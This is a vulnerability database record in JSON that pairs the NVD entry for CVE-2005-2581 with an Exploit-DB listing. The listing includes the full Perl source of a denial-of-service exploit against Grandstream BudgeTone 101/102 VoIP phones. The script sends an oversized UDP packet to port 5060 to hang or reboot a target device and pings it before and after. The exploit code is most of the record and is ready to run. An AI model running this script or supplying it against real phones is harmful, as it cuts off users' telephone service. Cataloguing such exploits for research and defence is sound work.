{"cve": [{"lastseen": "2017-04-18T15:51:23", "bulletinFamily": "NVD", "description": "Grandstream BudgeTone 101 and 102 running firmware 1.0.6.7 and possibly earlier versions, allows remote attackers to cause a denial of service (device hang or reboot) via a large UDP packet to port 5060.", "modified": "2016-10-17T23:28:47", "published": "2005-08-16T00:00:00", "id": "CVE-2005-2581", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2581", "title": "CVE-2005-2581", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:39:08", "bulletinFamily": "exploit", "description": "Grandstream Budge Tone 101/102 VOIP Phone Denial of Service Exploit. CVE-2005-2581. Dos exploit for hardware platform", "modified": "2005-08-12T00:00:00", "published": "2005-08-12T00:00:00", "id": "EDB-ID:1153", "href": "https://www.exploit-db.com/exploits/1153/", "type": "exploitdb", "title": "Grandstream Budge Tone 101/102 VOIP Phone Denial of Service Exploit", "sourceData": "#!/usr/bin/perl\r\n#\r\nuse IO::Socket;\r\nuse Term::ANSIColor;\r\n\r\n############################ U S A G E ###################################\r\nsystem (\"clear\");\r\nprint \"\\nGrandstream BT101/BT102 DoS\\n\";\r\nprint \"written by pierre kroma (kroma\\@syss.de)\\n\\n\";\r\n\r\nif (!$ARGV[2]){\r\nprint qq~\r\nUsage: perl grandstream-DoS.pl -s <ip-addr> <udp-port> {-r/-s}\r\n\r\n\t<ip-addr> = ;-)\r\n\t<udp-port> = 5060\r\n\r\n\t-r = 'reboot' \tthe Grandstream BT 101/102\r\n\t-s = 'shutdown' the Grandstream BT 101/102\r\n\r\n~; exit;}\r\n################################## D E F I N I T I O N S####################\r\n\r\n$victim = $ARGV[0];\r\n$port = $ARGV[1];\r\n$option = $ARGV[2];\r\n\r\nif ( $option == 'r' || $option == 'R' )\r\n{\t$request= 'k'x65534;}\r\n\r\nif ( $option == 's' || $option == 'S' )\r\n{\t$request= 'p'x65535;}\r\nelse\r\n{\tprint \"Wrong parameter - try it again\";\r\n\texit;\r\n}\r\n\r\n\r\n# ping the remote device\r\nprint color 'bold blue';\r\nprint \"\\nping the remote device $victim\\n\";\r\nprint color 'reset';\r\nsystem(\"ping -c 3 $victim\");\r\n\r\nprint color 'bold red';\r\nprint \"\\n Wait ... \\n\\n\\n\";\r\nprint color 'reset';\r\n$sox = IO::Socket::INET->new(Proto=>\"udp\",PeerPort=>\"$port\",PeerAddr=>\"$victim\");\r\n\r\nprint $sox $request;\r\nsleep 1;\r\nclose $sox;\r\n\r\n# ping the remote device\r\nprint color 'bold blue';\r\nprint \"ping the remote device $victim again\\n\";\r\nprint color 'reset';\r\nsystem(\"ping -c 3 $victim\");\n\n# milw0rm.com [2005-08-12]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1153/"}]}